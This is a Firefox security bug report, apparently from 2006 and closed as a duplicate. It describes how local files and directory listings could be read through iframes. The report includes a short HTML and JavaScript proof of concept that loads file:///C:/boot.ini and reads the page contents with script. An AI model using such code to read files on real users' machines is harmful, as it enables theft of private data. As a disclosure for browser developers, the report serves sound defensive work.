354059 - Directory listing and file content stealing via iframes.

Status: RESOLVED DUPLICATE of bug 230606

(Firefox :: Security, defect)

Description

[T3st3r]

User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7

I'd detected iframe-based code which is capable to steal either directory listing or even given file content.This is unfair.

Example tested by me:
(based on http://www.gnucitizen.org/blog/web-pages-from-hell)

<html>
<body>
<iframe src="file:///C:/boot.ini" onload="getContent(this)"></iframe>
<script>
  function getContent(iframe) {
    var content = '';
    if (iframe.contentDocument) {
      content = iframe.contentDocument.body.innerHTML; 
    } else if (iframe.contentWindow) {
      content = iframe.contentWindow.document.body.innerHTML;
    } else if (iframe.document) {
      content = iframe.document.body.innerHTML;
    }
    alert(content);
  }
</script>
</body>
</html>


Reproducible: Always

Steps to Reproduce:
1. You should have C:\boot.ini file (definitely means NT-based OS here), you can use another file name though.
2. Write down given code to something.html
3. Open this page in browser
Result:
 Alert() messagebox appears with file content.
Actual Results:  
Directory listings and file data could be accessed by browser without user's consent.Browser can send private\confidential data without user's consent.

Expected Results:  
Such actions surely should be denied by browser security checks.Othervice browser can act as trojan horse\data thief.

All credits to http://www.gnucitizen.org/blog/web-pages-from-hell - I'm just rechecked if this works for my Firefox.It is :(

Comment 1

[Bob Clary [:bc] (inactive)]

Attachment: testcase

I got a security error for 1.8.0.7, 1.8, 1.9 on winxp...

Comment 2

[Jesse Ruderman]

*** This bug has been marked as a duplicate of 230606 ***